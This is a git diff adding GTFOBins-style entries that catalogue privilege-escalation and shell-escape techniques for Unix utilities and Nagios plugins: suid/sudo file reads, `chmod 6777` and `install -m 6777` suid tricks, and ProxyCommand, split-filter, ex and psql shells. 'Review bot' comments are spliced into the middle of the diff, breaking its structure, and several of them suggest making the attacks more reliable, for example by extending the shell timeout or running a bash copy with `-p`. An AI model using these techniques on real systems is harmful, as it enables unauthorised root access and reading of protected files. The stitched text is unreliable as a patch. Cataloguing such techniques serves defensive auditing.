diff --git a/_gtfobins/basenc.md b/_gtfobins/basenc.md
new file mode 100644
index 0000000..0a9f6ca
--- /dev/null
+++ b/_gtfobins/basenc.md
@@ -0,0 +1,15 @@
+---
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        basenc --base64 $LFILE | basenc -d --base64
+  suid:
+    - code: |
+        LFILE=file_to_read
+        basenc --base64 $LFILE | basenc -d --base64
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo basenc --base64 $LFILE | basenc -d --base64
+---
diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md
new file mode 100644
index 0000000..5660689
--- /dev/null
+++ b/_gtfobins/check_by_ssh.md
@@ -0,0 +1,11 @@
+---
+description: |
+  This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+  shell:
+    - description: The shell will only last 10 seconds.
+      code: check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
+  sudo:
+    - description: The shell will only last 10 seconds.
+      code: sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
+---
diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md
new file mode 100644
index 0000000..225e2ae
--- /dev/null
+++ b/_gtfobins/check_cups.md
@@ -0,0 +1,13 @@
+---
+description: |
+  This is the `check_cups` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        check_cups --extra-opts=@$LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo check_cups --extra-opts=@$LFILE
+---
diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md
new file mode 100644
index 0000000..40fd225
--- /dev/null
+++ b/_gtfobins/check_log.md
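Review bot: The `suid` entry invokes `basenc` by bare name, whereas the other suid entries in this change (`./chmod`, `./column`, `./rev`, `./ss`) prefix the copied SUID binary with `./`, which is what tells the reader which invocation carries the elevated bit. The first command of the suid block should be `./basenc --base64 $LFILE | basenc -d --base64`; the decoding side can stay unprivileged. The same bare-name form appears in the comm, csplit, join, paste and pr entries of this diff.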
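Review bot: The "only last 10 seconds" caveat in both descriptions is check_by_ssh's default connection timeout, which the plugin exposes as `-t`/`--timeout`, so adding e.g. `-t 65535` next to `-H localhost -C xx` should keep the ProxyCommand shell alive far longer; worth confirming against the installed plugin version and then rewording the description. Separately, `|&` is a bash-only construct and ssh runs ProxyCommand through `$SHELL` (falling back to `/bin/sh`), so on hosts where that resolves to dash the command line may fail to parse — `2>&1 |` is the portable spelling and behaves the same under bash.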
@@ -0,0 +1,21 @@
+---
+description: |
+  This is the `check_log` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        OUTPUT=output_file
+        check_log -F $LFILE -O $OUTPUT
+        cat $OUTPUT
+  file-write:
+    - code: |
+        LFILE=file_to_write
+        INPUT=input_file
+        check_log -F $INPUT -O $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_write
+        INPUT=input_file
+        sudo check_log -F $INPUT -O $LFILE
+---
diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md
new file mode 100644
index 0000000..8ca90eb
--- /dev/null
+++ b/_gtfobins/check_memory.md
@@ -0,0 +1,13 @@
+---
+description: |
+  This is the `check_memory` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        check_memory --extra-opts=@$LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo check_memory --extra-opts=@$LFILE
+---
diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md
new file mode 100644
index 0000000..ef1e823
--- /dev/null
+++ b/_gtfobins/check_raid.md
@@ -0,0 +1,13 @@
+---
+description: |
+  This is the `check_raid` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        check_raid --extra-opts=@$LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo check_raid --extra-opts=@$LFILE
+---
diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md
new file mode 100644
index 0000000..2401373
--- /dev/null
+++ b/_gtfobins/check_ssl_cert.md
@@ -0,0 +1,26 @@
+---
+description: |
+  This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
+functions:
+  command:
+    - description: The host example.net must return a certificate via TLS
+      code: |
+        COMMAND=id
+        OUTPUT=output_file
+        TF=$(mktemp)
+        echo "$COMMAND | tee $OUTPUT" > $TF
+        chmod +x $TF
+        check_ssl_cert --curl-bin $TF -H example.net
+        cat $OUTPUT
+  sudo:
+    - description: The host example.net must return a certificate via TLS
+      code: |
+        COMMAND=id
+        OUTPUT=output_file
+        TF=$(mktemp)
+        echo "$COMMAND | tee $OUTPUT" > $TF
+        chmod +x $TF
+        umask 022
+        check_ssl_cert --curl-bin $TF -H example.net
+        cat $OUTPUT
+---
diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md
new file mode 100644
index 0000000..dbb297b
--- /dev/null
+++ b/_gtfobins/check_statusfile.md
@@ -0,0 +1,13 @@
+---
+description: |
+  This is the `check_statusfile` Nagios plugi plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        check_statusfile $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo check_statusfile $LFILE
+---
diff --git a/_gtfobins/chmod.md b/_gtfobins/chmod.md
index 61e3361..0fc3dde 100644
--- a/_gtfobins/chmod.md
+++ b/_gtfobins/chmod.md
@@ -1,12 +1,12 @@
 ---
-description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
+description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.
 functions:
   suid:
     - code: |
         LFILE=file_to_change
-        ./chmod 0777 $LFILE
+        ./chmod 6777 $LFILE
   sudo:
     - code: |
         LFILE=file_to_change
-        sudo chmod 0777 $LFILE
+        sudo chmod 6777 $LFILE
 ---
diff --git a/_gtfobins/column.md b/_gtfobins/column.md
new file mode 100644
index 0000000..80a173c
--- /dev/null
+++ b/_gtfobins/column.md
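Review bot: The description names the wrong plugin — it says `check_by_ssh` while the file documents `check_ssl_cert`; it should read ``This is the `check_ssl_cert` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.`` The `sudo` entry also never invokes sudo: its plugin line is identical to the unprivileged `command` variant, so the payload runs as the caller, and it should be `sudo check_ssl_cert --curl-bin $TF -H example.net`. The `umask 022` that only appears in the sudo variant is presumably there so the root-written `$OUTPUT` stays readable by the caller; a half-sentence in the description saying so would spare the reader the guess.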
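Review bot: The description contains a stray duplicated word, `Nagios plugi plugin`; it should read ``This is the `check_statusfile` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line.`` The command entries themselves follow the same shape as the other Nagios plugin pages in this change.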
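Review bot: Switching from `0777` to `6777` only buys privilege if the target file is owned by root (or another user of interest) and is something whose setuid bit is honoured on execution, which the new description does not say; a file already owned by the caller gains nothing from the extra bits. A short addition such as ``The target should be a root-owned executable; if it is a copy of bash, run it with `-p`, since bash otherwise drops the effective UID`` would make the entry self-explanatory for the suid and sudo cases alike.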
@@ -0,0 +1,17 @@
+---
+description: |
+  `column` expects textual data.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        column $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./column $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo column $LFILE
+---
diff --git a/_gtfobins/comm.md b/_gtfobins/comm.md
new file mode 100644
index 0000000..29551d9
--- /dev/null
+++ b/_gtfobins/comm.md
@@ -0,0 +1,15 @@
+---
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        comm $LFILE /dev/null 2>/dev/null
+  suid:
+    - code: |
+        LFILE=file_to_read
+        comm $LFILE /dev/null 2>/dev/null
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo comm $LFILE /dev/null 2>/dev/null
+---
diff --git a/_gtfobins/csplit.md b/_gtfobins/csplit.md
new file mode 100644
index 0000000..7b8927c
--- /dev/null
+++ b/_gtfobins/csplit.md
@@ -0,0 +1,18 @@
+---
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        csplit $LFILE 1
+        cat xx01
+  suid:
+    - code: |
+        LFILE=file_to_read
+        csplit $LFILE 1
+        cat xx01
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        csplit $LFILE 1
+        cat xx01
+---
diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md
new file mode 100644
index 0000000..49ebb37
--- /dev/null
+++ b/_gtfobins/ex.md
@@ -0,0 +1,24 @@
+---
+functions:
+  shell:
+    - code: |
+        ex
+        !/bin/sh
+  file-write:
+    - code: |
+        ex file_to_write
+        a
+        DATA
+        .
+        w
+        q
+  file-read:
+    - code: |
+        ex file_to_read
+        ,p
+        q
+  sudo:
+    - code: |
+        sudo ex
+        !/bin/sh
+---
diff --git a/_gtfobins/install.md b/_gtfobins/install.md
new file mode 100644
index 0000000..a10c425
--- /dev/null
+++ b/_gtfobins/install.md
@@ -0,0 +1,14 @@
+---
+description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a copy of the file.
+functions:
+  suid:
+    - code: |
+        LFILE=file_to_change
+        TF=$(mktemp)
+        ./install -m 6777 $LFILE $TF
+  sudo:
+    - code: |
+        LFILE=file_to_change
+        TF=$(mktemp)
+        sudo install -m 6777 $LFILE $TF
+---
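Review bot: The `sudo` entry never calls sudo — its `csplit $LFILE 1` is byte-identical to the unprivileged file-read, so the split runs as the caller and reads nothing it could not read already; the block should be `sudo csplit $LFILE 1` followed by `cat xx01`. The `suid` entry likewise uses bare `csplit` where this change's other suid entries (`./column`, `./rev`, `./ss`) prefix the copied binary with `./`. Since `xx00`/`xx01` land in the current directory, the privileged variants leave root-owned pieces behind; a note that the caller should run this from a directory they can write to, and clean up afterwards, would help.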
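Review bot: Both entries place the SUID copy at `$(mktemp)`, i.e. under `/tmp`, which on many hardened hosts is mounted `nosuid`, in which case the `6777` bits on the copy are ignored at exec time and the technique silently fails. The description should say that the destination must be on a filesystem without `nosuid` (the reader can set `TF` to any writable path instead of `mktemp`), and, as with the chmod page, that the source needs to be something whose setuid bit is useful — e.g. a shell copy later run with `-p`, since bash otherwise drops the effective UID.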
diff --git a/_gtfobins/join.md b/_gtfobins/join.md
new file mode 100644
index 0000000..50dff52
--- /dev/null
+++ b/_gtfobins/join.md
@@ -0,0 +1,15 @@
+---
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        join -a 2 /dev/null $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        join -a 2 /dev/null $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo join -a 2 /dev/null $LFILE
+---
diff --git a/_gtfobins/nroff.md b/_gtfobins/nroff.md
index f7fb52c..05d6b70 100644
--- a/_gtfobins/nroff.md
+++ b/_gtfobins/nroff.md
@@ -1,5 +1,10 @@
 ---
 functions:
+  file-read:
+    - description: The file is typeset and some warning messages may appear.
+      code: |
+        LFILE=file_to_read
+        nroff $LFILE
   shell:
     - code: |
         TF=$(mktemp -d)
diff --git a/_gtfobins/paste.md b/_gtfobins/paste.md
new file mode 100644
index 0000000..dd84bcb
--- /dev/null
+++ b/_gtfobins/paste.md
@@ -0,0 +1,15 @@
+---
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        paste $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        paste $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo paste $LFILE
+---
diff --git a/_gtfobins/pr.md b/_gtfobins/pr.md
new file mode 100644
index 0000000..a497a67
--- /dev/null
+++ b/_gtfobins/pr.md
@@ -0,0 +1,16 @@
+---
+description: Some bytes are altered so it might not be suitable for binary files.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        pr -T $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        pr -T $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        pr -T $LFILE
+---
diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md
new file mode 100644
index 0000000..40ca33f
--- /dev/null
+++ b/_gtfobins/psql.md
@@ -0,0 +1,14 @@
+---
+description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
+functions:
+  shell:
+    - code: |
+        psql
+        \?
+        !/bin/sh
+  sudo:
+    - code: |
+        psql
+        \?
+        !/bin/sh
+---
diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md
new file mode 100644
index 0000000..4e27759
--- /dev/null
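Review bot: The `sudo` entry never invokes sudo — its `pr -T $LFILE` is identical to the unprivileged file-read and therefore runs as the caller; it should be `sudo pr -T $LFILE`. The `suid` entry also uses bare `pr` where the other suid entries in this change (`./column`, `./rev`, `./ss`) mark the copied binary with `./`, so a reader cannot tell which invocation is the privileged one.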
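Review bot: The `sudo` entry is a verbatim copy of the `shell` entry and never calls sudo, so the pager and its `!/bin/sh` escape run as the caller; the first line should be `sudo psql`. Because the whole technique rides on the pager, the description would benefit from noting that psql only pages output that does not fit the terminal, and that a `PAGER`/`PSQL_PAGER` pointing at something other than `less` — or sudo's environment reset dropping the variable — changes the outcome; this depends on local configuration, so it should be worded as a caveat rather than a guarantee.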
+++ b/_gtfobins/rev.md
@@ -0,0 +1,15 @@
+---
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        rev $LFILE | rev
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./rev $LFILE | rev
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo rev $LFILE | rev
+---
diff --git a/_gtfobins/split.md b/_gtfobins/split.md
new file mode 100644
index 0000000..297bdb1
--- /dev/null
+++ b/_gtfobins/split.md
@@ -0,0 +1,27 @@
+---
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        TF=$(mktemp)
+        split $LFILE $TF
+        cat $TF*
+  command:
+    - description: Command execution using an existing or newly created file.
+      code: |
+        COMMAND=id
+        TF=$(mktemp)
+        split --filter=$COMMAND $TF
+    - description: Command execution using stdin (and close it directly).
+      code: |
+        COMMAND=id
+        echo | split --filter=$COMMAND /dev/stdin
+  shell:
+    - description: The shell prompt is not printed.
+      code: |
+        split --filter=/bin/sh /dev/stdin
+  sudo:
+    - description: The shell prompt is not printed.
+      code: |
+        split --filter=/bin/sh /dev/stdin
+---
diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md
new file mode 100644
index 0000000..62d863e
--- /dev/null
+++ b/_gtfobins/ss.md
@@ -0,0 +1,17 @@
+---
+description: |
+  The file content is actually parsed so only a part of the first line is returned as a part of an error message.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        ss -a -F $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./ss -a -F $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo ss -a -F $LFILE
+---
diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md
new file mode 100644
index 0000000..e113ca5
--- /dev/null
+++ b/_gtfobins/ssh-keyscan.md
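Review bot: The `sudo` entry is a verbatim copy of the `shell` entry and never invokes sudo, so the filtered shell runs as the caller; it should be `sudo split --filter=/bin/sh /dev/stdin`. The first `command` variant also runs `--filter` over a freshly created, empty `$(mktemp)` file, and GNU split appears to open an output chunk — and thus spawn the filter — only once it has bytes to write, so with an empty file `$COMMAND` may never execute; this is worth verifying, and inserting `echo > $TF` before the split (mirroring the `echo |` the stdin variant already uses) makes it robust either way. If that holds, the variant's description should say "non-empty file" rather than "existing or newly created file".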
@@ -0,0 +1,17 @@
+---
+description: |
+  The file content is actually parsed so only a part of each line is returned as a part of an error message.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        ssh-keyscan -f $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./ssh-keyscan -f $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo ssh-keyscan -f $LFILE
+---
diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md
new file mode 100644
index 0000000..93ec6fa
--- /dev/null
+++ b/_gtfobins/tbl.md
@@ -0,0 +1,17 @@
+---
+description: |
+  The read file content is corrupted by additional text at the beginning.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        tbl $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./tbl $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo tbl $LFILE
+---
diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md
new file mode 100644
index 0000000..a48f957
--- /dev/null
+++ b/_gtfobins/troff.md
@@ -0,0 +1,17 @@
+---
+description: |
+  The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        troff $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./troff $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo troff $LFILE
+---
diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md
new file mode 100644
index 0000000..8d23cb1
--- /dev/null
+++ b/_gtfobins/xmodmap.md
@@ -0,0 +1,17 @@
+---
+description: |
+  The read file content is corrupted by error prints.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        xmodmap -v $LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./xmodmap -v $LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo xmodmap -v $LFILE
+---